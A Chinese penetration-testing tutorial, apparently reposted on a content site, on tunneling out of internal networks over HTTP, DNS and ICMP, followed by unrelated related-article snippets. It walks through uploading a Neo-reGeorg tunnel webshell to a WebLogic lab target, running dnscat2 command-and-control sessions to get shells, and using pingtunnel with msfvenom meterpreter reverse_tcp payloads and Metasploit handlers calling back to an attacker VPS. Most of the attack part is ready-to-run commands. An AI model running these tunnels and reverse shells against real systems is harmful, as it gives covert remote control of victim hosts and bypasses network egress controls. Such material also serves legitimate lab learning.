内网隧道—HTTP\DNS\ICMP

       本文仅限于安全研究和学习,用户承担因使用此工具而导致的所有法律和相关责任! 作者不承担任何法律和相关责任!

HTTP隧道

Neo-reGeorg

Neo-reGeorg 是一个旨在积极重构 reGeorg 的项目,目的是:

提高可用性,避免特征检测
提高 tunnel 连接安全性
提高传输内容保密性
应对更多的网络环境场景下使用

靶场环境:cve-2017-10271  weblogic

#靶场攻击过程,使用脚本工具得到shell,在此略过

1.设置密码生成 tunnel.(aspx|ashx|jsp|jspx|php) 并上传到WEB服务器

 2.使用蚁剑上传JSP文件

上传至此目录:可以访问到文件

/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/

3.使用 neoreg.py 连接WEB服务器,在本地建立 socks 代理,代理默认端口 1080

修改配置文件:vim proxychains4.conf

 执行命令:

 #测试代理: proxychains curl 127.0.0.1:7001

DNS隧道

Dnscat2

       dnscat2是一个DNS隧道工具,通过DNS协议创建加密的命令和控制通道,它的一大
特色就是服务端会有一个命令行控制台,所有的指令都可以在该控制台内完成。包
括:文件上传、下载、反弹Shell。
直连模式:客户端直接向指定IP的恶意DNS服务器发起DNS解析请求。

中继模式:像我们平时上网一样,DNS解析先经过互联网的迭代解析,最后指向我们
的恶意DNS服务器。相比直连,速度较慢,但是更安全。

服务端安装

apt install ruby ruby-dev git make g++ ruby-bundler
gem install bundler

git clone https://github.com/iagox86/dnscat2.git(也可以先下载文件,然后上传至VPS)
cd dnscat2/server
bundle install   #如此命令报错,和本地网络有关,多试几次


客户端编译

Linux:

git clone https://github.com/iagox86/dnscat2.git  
cd dnscat2/client/
make  

Windows:

下载Windows版本

在本地编译上传

上传已经编译好的 .exe程序

make编译之后会在此目录下生成一个dnscat可执行二进制文件。
Linux systemd-resolve占用53端口的解决方法: https://www.itren.org/319.html

Dnscat2直连模式

启动服务端

ruby ./dnscat2.rb

 启动客户端

 vps收到会话

help

windows

 进入session 1: session -i 1

shell    #获取主机shell

进入session 2 : session -i 2

 执行命令:

whoami

 直连模式流量特征:tcpdump udp dst port 53

Dnscat2中继模式

环境准备: 
1. 一台公网C&C服务器      
2. 一台内网靶机              #以win7为例
3. 一个可配置解析的域名

配置DNS域名解析:
创建A记录,将自己的域名解析服务器(ns.hack.com)指向云服务器(VPS IP)

A类解析是在告诉域名系统,ns.hacker.com的IP地址是 xxx.xxx.xxx.xxx

创建NS记录,将子域名 dns.hetian.cn 的DNS解析交给 ns.hack.com
NS解析是在告诉域名系统,想要知道 dns.hack.com 的IP地址,就去问ns.hacker.com 

 vps防火墙设置:开放全部UDP端口

启动服务端

ruby ./dnscat2.rb dns.xxx.xxx --secret=abcd

secret --指定密码

启动客户端

server #指定VPS地址

服务端收到session 3

获取shell

进入会话:session -i 4

执行命令: whoami

 

ICMP隧道

Pingtunnel

ICMP隧道
      通过某种信道获取了内网主机的shell,但是当前信道不适合做远控的通信信道,
tcp 和 udp 等传输层协议不能出网, dns 、 http 等应用层协议也不能出网,只有
icmp 协议可以出网。

目的:上线仅icmp协议出网的内网主机

ICMP隧道转发TCP上线MSF

1.VPS启动ICMP隧道服务端

./pingtunnel -type server -noprint 1 -nolog 1

2.靶机启动ICMP隧道客户端

pingtunnel.exe -type client -l 127.0.0.1:9999 -s vpsip -t vpsip:7777 -tcp 1 -noprint 1 -nolog 1


3. MSF 生成反弹 shell 的 payload 上传到靶机

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=127.0.0.1 lport=9999 -f exe > hot.exe

 4.执行 payload 反弹 shell 到 MSF

设置侦听:

msfconsole

use exploit/multi/handler

set lhost xx.xx.xx.xx   (vps的内网IP)

set lport 8866

set payload windows/x64/meterpreter/reverse_tcp

exploit

5. 靶机执行payload,msf上线

 

ICMP隧道转发Socks上线MSF

1. VPS启动ICMP隧道服务端

./pingtunnel -type server -noprint 1 -nolog 1

2.靶机启动ICMP隧道客户端

pingtunnel.exe -type client -l 127.0.0.1:9999 -s VPSIP -sock5 1 -noprint 1 -nolog 1

#  icmp隧道客户端监听127.0.0.1:9999启动socks5服务,
    通过连接到VPS IP的icmp隧道,
    由icmpserver转发socks5代理请求到目的地址 VPSIP:8899

3.MSF 生成反弹 shell 的 payload 上传到靶机,并执行

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=VPSIP lport=8866 HttpProxyType=SOCKS HttpProxyHost=127.0.0.1 HttpProxyPort=9999 -f exe > c2.exe

 5.设置侦听

handler -p windows/x64/meterpreter/reverse_tcp -H xx.xx.xx.xx -P8866

#IP是vps的内网IP

 6.MSF收到会话

 可以执行命令

参考:

内网渗透之内网穿透 - 先知社区

...

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/39205.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

山西电力市场日前价格预测【2023-08-17】

日前价格预测 预测明日(2023-08-17)山西电力市场全天平均日前电价为376.70元/MWh。其中,最高日前电价为431.75元/MWh,预计出现在19: 45。最低日前电价为339.25元/MWh,预计出现在13: 15。 价差方向预测 1: 实…

python实现抽奖小程序

使用Python的Tkinter库来添加抽奖程序的界面操作。下面是一个示例代码: import random import tkinter as tkdef lottery():prizes [一等奖, 二等奖, 三等奖, 谢谢参与]winner random.choice(prizes)result_label.config(text恭喜您获得了{}!.format(…

未出现过的最小正整数

给定一个长度为 n 的整数数组,请你找出未在数组中出现过的最小正整数。 样例 输入1:[-5, 3, 2, 3]输出1:1输入2:[1, 2, 3]输出2:4数据范围 1≤n≤105 , 数组中元素的取值范围 [−109,109]。 代码: c…

MySql主从复制1032错误(Slave_IO_Running: Yes Slave_SQL_Running: No)

MySql主从复制1032错误(Slave_IO_Running: Yes Slave_SQL_Running: No) Slave_IO_Running: Yes Slave_SQL_Running: No报错: Last_SQL_Error: Could not execute Delete_rows event on table hr.test; Can’t find record in ‘test’, Erro…

【Unity造轮子】制作一个简单的2d抓勾效果(类似蜘蛛侠的技能)

文章目录 前言开始1. 实现简单的抓勾效果2. 高阶钩爪效果 源码参考完结 前言 欢迎阅读本文,本文将向您介绍如何使用Unity游戏引擎来实现一个简单而有趣的2D抓勾效果,类似于蜘蛛侠的独特能力。抓勾效果是许多动作游戏和平台游戏中的常见元素,…

【AI绘画】3分钟学会ikun幻术图

目录 前言一、效果展示二、准备工作三、操作步骤3.1平台创建实例3.2 启动SD 四、安装QR Code Monster 模型五、成图 前言 大家热爱的ikun幻术在今天的分享中将呈现。在本文中,我们将揭示一个备受欢迎的图像幻术技术,让您感受到令人惊叹的视觉创造力。 …

springboot+vue游戏攻略推荐网站的设计与开发_s5832

热门网游推荐网站是一个利用JAVA技术建设的网上管理系统,在热门网游推荐管理中实现信息化。系统的设计就是为了迎合广大用户需求而创建的一个界面简洁、有定向内容、业务逻辑简单易操作的热门网游推荐网站。本文以热门网游推荐为例,提出了利用JAVA技术设…

Angular中的ActivatedRoute和Router

Angular中的ActivatedRoute和Router解释 在Angular中,ActivatedRoute和Router是两个核心的路由服务。他们都提供可以用来检查和操作当前页面路由信息的方法和属性。 ActivatedRoute ActivatedRoute是一个保存关于当前路由状态(如路由参数、查询参数以…

Linux下grep通配容易混淆的地方

先上一张图: 我希望找到某个版本为8的一个libXXX.8XXX.so ,那么应该怎么写呢? 先看这种写法对不对: 是不是结果出乎你的意料之外? 那么我们来看一下规则: 这里的 "*" 表示匹配前一个字符的零个或多个 于是我们就不难理解了: lib*8*.so 表示 包…

医疗PACS源码,支持三维多平面重建、三维容积重建、三维表面重建、三维虚拟内窥镜

C/S架构的PACS系统源码,PACS主要进行病人信息和影像的获取、处理、存储、调阅、检索、管理,并通过网络向全院提供病人检查影像及诊断报告;各影像科室之间共享不同设备的病人检查影像及诊断报告;在诊断工作站上,调阅HIS中病人的其它…

拒绝摆烂!C语言练习打卡第二天

🔥博客主页:小王又困了 📚系列专栏:每日一练 🌟人之为学,不日近则日退 ❤️感谢大家点赞👍收藏⭐评论✍️ 目录 一、选择题 📝1.第一题 📝2.第二题 📝…

P1304 哥德巴赫猜想

题目描述 输入一个偶数 N N N,验证 4 ∼ N 4\sim N 4∼N 所有偶数是否符合哥德巴赫猜想:任一大于 2 2 2 的偶数都可写成两个质数之和。如果一个数不止一种分法,则输出第一个加数相比其他分法最小的方案。例如 10 10 10, 10 …

Springboot写单元测试

导入依赖 <dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-test</artifactId><exclusions><exclusion><groupId>org.junit.vintage</groupId><artifactId>junit-vintag…

django实现悲观锁乐观锁

前期准备 # 线上卖图书-图书表 图书名字&#xff0c;图书价格&#xff0c;库存字段-订单表&#xff1a; 订单id&#xff0c;订单名字# 表准备class Book(models.Model):name models.CharField(max_length32)price models.IntegerField() #count models.SmallIntegerField…

Python实时监控键盘的输入并打印出来

要实现Python实时监控键盘的输入并打印出来&#xff0c;可以使用pynput模块。 首先&#xff0c;需要安装pynput模块&#xff1a; pip install pynput 然后&#xff0c;可以编写以下代码来实现实时监控键盘输入并打印出来的功能&#xff1a; from pynput import keyboard# 定…

【Unity每日一记】方位辨别—向量的叉乘点乘结合

&#x1f468;‍&#x1f4bb;个人主页&#xff1a;元宇宙-秩沅 &#x1f468;‍&#x1f4bb; hallo 欢迎 点赞&#x1f44d; 收藏⭐ 留言&#x1f4dd; 加关注✅! &#x1f468;‍&#x1f4bb; 本文由 秩沅 原创 &#x1f468;‍&#x1f4bb; 收录于专栏&#xff1a;uni…

grafana 的 ws websocket 连接不上的解决方式

使用了多层的代理方式&#xff0c;一层没有此问题 错误 WebSocket connection to ‘wss://ip地址/grafana01/api/live/ws’ failed: 日志报错 msg“Request Completed” methodGET path/api/live/ws status403 解决方式 # allowed_origins is a comma-separated list of o…

Flutter:简单搞一个内容高亮

内容高亮并不陌生&#xff0c;特别是在搜索内容页面&#xff0c;可以说四处可见&#xff0c;就拿掘金这个应用而言&#xff0c;针对某一个关键字&#xff0c;我们搜索之后&#xff0c;与关键字相同的内容&#xff0c;则会高亮展示&#xff0c;如下图所示&#xff1a; 如上的效果…

【Linux操作系统】举例解释Linux系统编程中文件io常用的函数

在Linux系统编程中&#xff0c;文件IO操作是非常常见和重要的操作之一。通过文件IO操作&#xff0c;我们可以打开、读取、写入和关闭文件&#xff0c;对文件进行定位、复制、删除和重命名等操作。本篇博客将介绍一些常用的文件IO操作函数。 文章目录 1. open()1.1 原型、参数及…